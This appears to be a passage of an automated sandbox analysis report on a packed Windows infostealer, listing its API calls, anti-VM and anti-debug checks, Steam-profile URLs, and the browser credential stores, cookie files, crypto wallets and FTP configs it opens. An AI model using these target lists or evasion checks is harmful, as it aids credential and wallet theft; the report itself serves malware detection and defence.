          Source: nvtoaldlrg.exe, 00000000.00000002.1048162417.00000000044A2000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
          Source: nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
          Source: nvtoaldlrg.exe, 00000000.00000003.922358612.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/%M
          Source: nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/-M
          Source: nvtoaldlrg.exe, 00000000.00000003.923852702.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/5M2Ps
          Source: nvtoaldlrg.exe, 00000000.00000003.923852702.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/=M:PA
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
          Source: nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994573747.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/EB
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/F
          Source: nvtoaldlrg.exe, 00000000.00000003.923852702.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.922358612.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/MB
          Source: nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/System32
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
          Source: nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
          Source: nvtoaldlrg.exe, 00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/7656119982
          Source: nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994573747.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128
          Source: nvtoaldlrg.exe, 00000000.00000003.923936426.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128.36_
          Source: nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/badges
          Source: nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/inventory/

          System Summary

          Source: nvtoaldlrg.exe Static PE information: section name:
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B786B8 NtReadFile, 0_2_00B786B8
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B78634 NtClose, 0_2_00B78634
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B78650 NtSetInformationFile, 0_2_00B78650
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B787F0 NtProtectVirtualMemory, 0_2_00B787F0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B78710 NtCreateFile, 0_2_00B78710
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B78BD0 NtClose, VirtualFree, 0_2_00B78BD0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B780B0 NtSetValueKey, 0_2_00B780B0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B78028 NtCreateKey, 0_2_00B78028
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B78070 NtEnumerateKey, 0_2_00B78070
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B78180 NtNotifyChangeKey, 0_2_00B78180
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B781E0 NtQueryMultipleValueKey, 0_2_00B781E0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B782E0 NtWriteFile, 0_2_00B782E0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B7827C NtSetInformationKey, 0_2_00B7827C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B783F4 NtDuplicateObject, 0_2_00B783F4
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B78338 NtQueryObject, 0_2_00B78338
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B7836C NtQueryDirectoryFile, 0_2_00B7836C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B7848C NtLockFile, 0_2_00B7848C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B784EC NtUnlockFile, 0_2_00B784EC
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B7843C NtQueryVolumeInformationFile, 0_2_00B7843C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B7858C NtMapViewOfSection, 0_2_00B7858C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B785EC NtCreateSection, 0_2_00B785EC
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B78558 NtQuerySection, 0_2_00B78558
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B78684 NtQueryInformationFile, 0_2_00B78684
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B78778 NtOpenFile, 0_2_00B78778
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77BB0 NtQueryInformationProcess, 0_2_00B77BB0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77BE4 NtCreateThread, 0_2_00B77BE4
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77B50 NtDeviceIoControlFile, 0_2_00B77B50
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77CA0 NtCreateProcessEx, 0_2_00B77CA0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77CF8 NtCreateUserProcess, 0_2_00B77CF8
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77C50 NtCreateProcess, 0_2_00B77C50
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77D8C NtSetVolumeInformationFile, 0_2_00B77D8C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77DE0 NtQuerySecurityObject, 0_2_00B77DE0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77D60 NtOpenKeyEx, 0_2_00B77D60
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77E14 NtNotifyChangeDirectoryFile, 0_2_00B77E14
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77E6C NtFsControlFile, 0_2_00B77E6C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77FB4 NtQueryKey, 0_2_00B77FB4
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77FE8 NtQueryValueKey, 0_2_00B77FE8
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77F04 NtAccessCheck, 0_2_00B77F04
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00B77F74 NtEnumerateValueKey, 0_2_00B77F74
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe Code function: 0_2_00BD6CA4: CreateFileA, DeviceIoControl, 0_2_00BD6CA4
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Code function: String function: 00B29D9C appears 71 times
          Source: nvtoaldlrg.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: nvtoaldlrg.exe | Static PE information: Section: ZLIB complexity 0.9996248570884146
          Source: nvtoaldlrg.exe | Static PE information: Section: ZLIB complexity 0.99658203125
          Source: nvtoaldlrg.exe | Static PE information: Section: ZLIB complexity 0.99390625
          Source: nvtoaldlrg.exe | Static PE information: Section: ZLIB complexity 0.9977022058823529
          Source: nvtoaldlrg.exe | Static PE information: Section: .data ZLIB complexity 0.9959839400245634
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/7
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: nvtoaldlrg.exe, 00000000.00000003.866156085.00000000044C3000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.866412146.0000000001516000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.842999188.00000000044A6000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.842426263.00000000044C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: nvtoaldlrg.exe | Virustotal: Detection: 58%
          Source: nvtoaldlrg.exe | ReversingLabs: Detection: 68%
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | File read: C:\Users\user\Desktop\nvtoaldlrg.exe
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Section loaded: apphelp.dll, version.dll, shfolder.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, sspicli.dll, winhttp.dll, ondemandconnroutehelper.dll, webio.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, dpapi.dll, kernel.appcore.dll, wbemcomn.dll, amsi.dll, userenv.dll
          Source: nvtoaldlrg.exe | Static file information: File size 1311232 > 1048576

          Data Obfuscation

          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Unpacked PE file: 0.2.nvtoaldlrg.exe.ac0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
          Source: nvtoaldlrg.exe | Static PE information: section name:
          Source: nvtoaldlrg.exe | Static PE information: section name: entropy: 7.998779735129503
          Source: nvtoaldlrg.exe | Static PE information: section name: entropy: 7.928958124958163
          Source: nvtoaldlrg.exe | Static PE information: section name: entropy: 7.974744623175405
          Source: nvtoaldlrg.exe | Static PE information: section name: entropy: 7.970326652039579
          Source: nvtoaldlrg.exe | Static PE information: section name: .data entropy: 7.974703529943176
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | System information queried: FirmwareTableInformation
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Window / User API: threadDelayed 711
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe TID: 7132 | Thread sleep count: 711 > 30
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe TID: 7152 | Thread sleep time: -180000s >= -30000s
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe TID: 6352 | Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Code function: 0_2_00B50490 FindFirstFileW
          Source: nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046723334.0000000001455000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045742040.0000000001454000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: &VBoxService.exe
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: VBoxService.exe
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000C69000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ~VirtualMachineTypes
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000C69000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ]DLL_Loader_VirtualMachine
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: VMWare
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000C69000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Process information queried: ProcessInformation

          Anti Debugging

          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Thread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Code function: 0_2_00B09630 LdrInitializeThunk
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Code function: 0_2_032D8094 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Code function: 0_2_032D7DCA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Code function: 0_2_00BD5268 cpuid
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | Code function: 0_2_00B76CC0 GetTimeZoneInformation
          Source: nvtoaldlrg.exe, 00000000.00000003.994650409.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923610742.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          Source: Yara match | File source: Process Memory Space: nvtoaldlrg.exe PID: 7128, type: MEMORYSTR
          Source: Yara match | File source: 0.2.nvtoaldlrg.exe.ac0000.0.unpack, type: UNPACKEDPE
          Source: nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: :20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%F
          Source: nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ,"window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":8
          Source: nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: a%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d
          Source: nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: lets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodusD
          Source: nvtoaldlrg.exe, 00000000.00000003.921858866.00000000014D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: tget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"W
          Source: nvtoaldlrg.exe, 00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\FTPInfo
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\FTPGetter
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\FTPbox
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\FTPRush
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\ProgramData\SiteDesigner\3D-FTP
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live
